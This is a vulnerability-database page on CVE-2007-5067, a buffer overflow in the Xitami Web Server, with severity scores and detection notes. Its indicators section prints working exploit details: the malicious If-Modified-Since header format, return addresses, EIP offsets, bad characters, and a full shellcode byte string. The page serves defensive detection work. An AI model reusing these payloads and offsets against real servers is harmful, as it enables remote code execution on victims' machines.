cbcvebase.
CVE-2007-5067
published 2007-09-24

CVE-2007-5067: Multiple buffer overflows in iMatix Xitami Web Server 2.5c2 allow remote attackers to execute arbitrary code via a long If-Modified-Since header to (1)…

PriorityP260high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
73.24%
99.4th percentile
Multiple buffer overflows in iMatix Xitami Web Server 2.5c2 allow remote attackers to execute arbitrary code via a long If-Modified-Since header to (1) xigui32.exe or (2) xitami.exe.

Affected

1 ranges
VendorProductVersion rangeFixed in
imatixxitami

Detection & IOCsextracted from sources · hover to see the quote

processxigui32.exe
processxitami.exe
commandGET / HTTP/1.1 Host: <host> If-Modified-Since: Evil, <payload>
other0x7CA76981 (jmp esp, shell32.dll XP SP2 Polish)
other0x0044ceff (ret xigui32.exe)
other0x0047c1f2 (ret xitami.exe)
bytes
\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2
  • Detect HTTP requests with an 'If-Modified-Since' header value beginning with 'Evil, ' followed by a long string — this is the exact malicious header format used in the exploit.
  • For xigui32.exe, EIP overwrite occurs at offset 76 bytes (72 bytes padding + 4-byte return address) in the If-Modified-Since header value.
  • For xitami.exe, EIP overwrite occurs at offset 104 bytes in the If-Modified-Since header value.
  • The Metasploit module uses the Egghunter technique and places the egg tag in the Host header; detect HTTP requests where the Host header contains egghunter shellcode bytes alongside an oversized If-Modified-Since header.
  • Fingerprint the vulnerable server by checking for 'Xitami' in the HTTP banner response to GET / HTTP/1.1.
  • Bad characters for payload delivery are null byte, newline, and carriage return (\x00\x0a\x0d); presence of these in the If-Modified-Since header would indicate a non-exploit or broken attempt.
  • ·The jmp esp ROP gadget address (0x7CA76981 in shell32.dll) is specific to Windows XP SP2 Polish; the Metasploit module uses universal return addresses within xigui32.exe and xitami.exe themselves, making it OS-locale-independent.
  • ·The Metasploit module targets Windows platforms only (w2ksp0, w2ksp4, xpsp0, xpsp2 en tested) and uses EXITFUNC=process.
  • ·Payload space is constrained to 700 bytes, which is why the Metasploit module employs the Egghunter technique rather than embedding shellcode directly in the overflow buffer.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.